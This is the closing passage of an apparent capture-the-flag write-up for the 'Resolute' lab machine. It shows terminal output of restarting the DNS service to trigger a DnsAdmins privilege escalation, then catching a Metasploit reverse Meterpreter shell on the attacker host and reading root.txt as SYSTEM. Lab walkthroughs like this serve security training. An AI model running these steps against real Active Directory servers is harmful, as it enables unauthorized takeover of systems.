        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents>

then start dns service

# bash

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 1144
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents>


and finally got a Administrator shell !

# bash

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.187:9001 
[*] Sending stage (201283 bytes) to 10.10.10.169
[*] Meterpreter session 1 opened (10.10.14.187:9001 -> 10.10.10.169:59761) at 2020-05-31 20:35:54 +0800

meterpreter >

System Information

# bash

meterpreter > sysinfo
Computer        : RESOLUTE
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : MEGABANK
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Get the root.txt

So letโ€™s pop up a shell and get the root.txt :

# bash

meterpreter > shell
Process 1596 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

# bash

C:\Users>cd Administrator/Desktop
cd Administrator/Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 923F-3611

 Directory of C:\Users\Administrator\Desktop

12/04/2019  06:18 AM    <DIR>          .
12/04/2019  06:18 AM    <DIR>          ..
12/03/2019  08:32 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  30,837,903,360 bytes free

C:\Users\Administrator\Desktop>Get-Content "root.txt" | Measure-Object -Character -Word    
Get-Content "root.txt" | Measure-Object -Character -Word
'Get-Content' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>powershell
powershell
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\Desktop> Get-Content "root.txt" | Measure-Object -Character -Word
Get-Content "root.txt" | Measure-Object -Character -Word

Lines Words Characters Property
----- ----- ---------- --------
          1         32         


PS C:\Users\Administrator\Desktop>


If you liked my writeup please leave a respect on my Profile

Payas0

Referrences:

Abusing DNSAdmins privilege for escalation in Active Directory

From DnsAdmins to SYSTEM to Domain Compromise

Transferring Files from Linux to Windows (post-exploitation)